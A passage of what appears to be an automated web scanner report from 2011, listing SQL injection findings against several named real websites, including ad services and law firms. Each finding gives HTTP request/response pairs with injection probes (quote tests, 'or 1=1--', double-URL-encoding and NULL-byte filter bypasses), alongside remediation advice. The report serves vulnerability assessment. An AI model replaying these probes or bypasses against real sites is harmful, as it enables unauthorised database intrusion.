28.37. http://www.butlerrubin.com/web/br.nsf/tableback.jpg

28.38. http://www.conferenceservers.com/browser/proxy.asp

28.39. http://www.digiware.net/templates/home/favicon.ico

28.40. http://www.digiware.net/templates/intena1/favicon.ico

28.41. http://www.dmoc.com/favicon.ico

28.42. http://www.elawmarketing.com/favicon.ico

28.43. http://www.facebook.com/extern/login_status.php

28.44. http://www.foxbusiness.com/authentication/logout/submit

28.45. http://www.foxbusiness.com/static/all/generated/js/fb2-breaking-news.js

28.46. http://www.foxbusiness.com/static/all/img/global/logo-disqus-1.gif

28.47. http://www.google.com/search

28.48. http://www.hbsr.com/favicon.ico

28.49. http://www.korteco.com/sites/all/themes/korteco/favicon.ico

28.50. http://www.mimecast.com/Global/HeaderTitleVideos/Images/SecurityV4.png

28.51. http://www.moritthock.com/index.php

28.52. http://www.nytimes.com/adx/bin/adx_remote.html

28.53. http://www.privateequityinfo.com/favicon.ico

28.54. http://www.privateequityinfo.com/grfx/grfx2009/topmenu/shadow.jpg

28.55. http://www.tuckerellis.com/tucker-favicon.ico

28.56. https://www.usaa.com/favicon.ico

28.57. https://www.wellsfargo.com/img/theprivatebank/apa.jpg

28.58. http://www.wolfgreenfield.com/favicon.ico

28.59. http://www.wolfgreenfield.com/javascript/c_smartmenus.js

29. Content type is not specified

29.1. http://ad.yieldmanager.com/st

29.2. http://lfov.net/webrecorder/g/chimera.js

29.3. http://lfov.net/webrecorder/js/listen.js

29.4. https://webmail-us.mimecast.com/favicon.ico

30. SSL certificate

1. SQL injection
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://da.newstogram.com/hg.php [DMUserTrack cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The DMUserTrack cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the DMUserTrack cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7'

Response 1

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7%27; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 123

Newstogram.completed({"Histogram":{"status":"error","uid":"896A200B-7889-4691-9DB7-6D96659E63C7'","ip":"173.193.214.243"}})

Request 2

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7''

Response 2

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7%27%27; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 124

Newstogram.completed({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7''","ip":"173.193.214.243"}})

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The bpp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bpp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the bpp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2%2527&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:19:45 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2728

<html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,load:g}
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2%2527%2527&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:19:46 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1496

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><IFRAME SRC="http://ad.doubleclick.net/adi/N4848.150143.2069808252521/B5487153;sz=728x90;click=http://googleads.g
...[SNIP]...

1.3. http://p.addthis.com/pixel [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://p.addthis.com
Path:   /pixel

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Cookie: uid=4dc048d9159e4ae3; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Cookie: uid=4dc048d9159e4ae3; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:45:07 GMT
Location: http://va.px.invitemedia.com/pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


1.4. http://p.addthis.com/pixel [uid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://p.addthis.com
Path:   /pixel

Issue detail

The uid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the uid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3%00'; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3%00''; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:49:38 GMT
Location: http://va.px.invitemedia.com/pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


1.5. http://www.pomerantzlaw.com/attorneys.html [attorneyID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /attorneys.html

Issue detail

The attorneyID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attorneyID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.html?action=attorneyDetail&attorneyID=24' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.3.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 11:49:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23344
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '24' <br />
...[SNIP]...

1.6. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The CaseID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CaseID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /cases.html?action=caseDetail&CaseID=102' HTTP/1.1
Host: www.pomerantzlaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 11:40:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23366
Set-Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:25 GMT
Set-Cookie: CFTOKEN=0; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:25 GMT
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '102' <br />
...[SNIP]...

1.7. http://www.tuckerellis.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuckerellis.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17622879%20or%201%3d1--%20 and 17622879%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?117622879%20or%201%3d1--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Tucker+Ellis+%26+West&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:42 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Content-Length: 5043
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
   <head>
       <title>Apache HTTP Server Test Page powered by CentOS</title>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
       <style type="text/css">
           body {
               background-color: #fff;
               color: #000;
               font-size: 0.9em;
               font-family: sans-serif,helvetica;
               margin: 0;
               padding: 0;
           }
           :link {
               color: #0000FF;
           }
           :visited {
               color: #0000FF;
           }
           a:hover {
               color: #3399FF;
           }
           h1 {
               text-align: center;
               margin: 0;
               padding: 0.6em 2em 0.4em;
               background-color: #3399FF;
               color: #ffffff;
               font-weight: normal;
               font-size: 1.75em;
               border-bottom: 2px solid #000;
           }
           h1 strong {
               font-weight: bold;
           }
           h2 {
               font-size: 1.1em;
               font-weight: bold;
           }
           .content {
               padding: 1em 5em;
           }
           .content-columns {
               /* Setting relative positioning allows for
               absolute positioning for sub-classes */
               position: relative;
               padding-top: 1em;
           }
           .content-column-left {
               /* Value for IE/Win; will be overwritten for other browsers */
               width: 47%;
               padding-right: 3%;
               float: left;
               padding-bottom: 2em;
           }
           .content-column-right {
               /* Values for IE/Win; will be overwritten for other browsers */
               width: 47%;
               padding-left: 3%;
               float: left;
               padding-bottom: 2em;
           }
           .content-columns>.content-column-left, .content-columns>.content-column-right {
               /* Non-IE/Win */
           }
           img {
               border: 2px solid #fff;
               padding: 2px;
               margin: 2px;
           }
           a:hover img {
               border: 2px solid #3399FF;
           }
       </style>
   </head>

   <body>
   <h1>Apache 2 Test Page<br><font size="-1"><strong>powered by</font> CentOS</strong></h1>

       <div class="content">
           <div class=
...[SNIP]...

Request 2

GET /?117622879%20or%201%3d2--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Tucker+Ellis+%26+West&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Tue, 03 Jul 2001 06:00:00 GMT
Last-Modified: Thu, 12 May 2011 12:21:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Tucker Ellis &amp; West LLP</title>
<meta name="description" content="Tucker Ellis &amp; West LLP is an Ohio based law firm specializing in Business Litigation, Mass Tort, and Product Liability."></meta>
<link rel="stylesheet" type="text/css" href="css/home.css" />
<link rel="shortcut icon" href="tucker-favicon.ico" />
<script type="text/javascript" src="javascript/functions.js"></script>
</head>

<body onload="MM_preloadImages('images/over/Untitled-1-copy_01.jpg','images/over/Untitled-1-copy_02.jpg','images/over/Untitled-1-copy_03.jpg','images/over/Untitled-1-copy_04.jpg','images/over/Untitled-1-copy_05.jpg','images/over/Untitled-1-copy_06.jpg','images/over/Untitled-1-copy_07.jpg','images/over/Untitled-1-copy_13.jpg','images/over/Untitled-1-copy_14.jpg','images/over/Untitled-1-copy_10.jpg','images/over/Untitled-1-copy_16.jpg','images/over/Untitled-1-copy_09.jpg','images/over/Untitled-1-copy_12.jpg','images/over/Untitled-1-copy_17.jpg')">

<div id="wrapper">

<div id="container">

<div id="mast_head">

<div id="home_logo">
<img src="images/logo.gif" alt="Tucker Ellis &amp; West" width="367" height="50" id="logo" border="0" title="Tucker Ellis &amp; West" />
</div>

<div id="phrase">
&nbsp;
</div>
</div>

</div>

<div style="clear:both"></div>


<div id="navigation">
<ul id="nav_main">
<li id="nm_1"
...[SNIP]...

1.8. http://www.tuckerellis.com/tucker-favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuckerellis.com
Path:   /tucker-favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10924747'%20or%201%3d1--%20 and 10924747'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tucker-favicon.ico10924747'%20or%201%3d1--%20 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:47 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /tucker-favicon.ico10924747' or 1=1--
on this server.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at www.tuckerellis.com Port 80</address>
</body></html>

Request 2

GET /tucker-favicon.ico10924747'%20or%201%3d2--%20 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
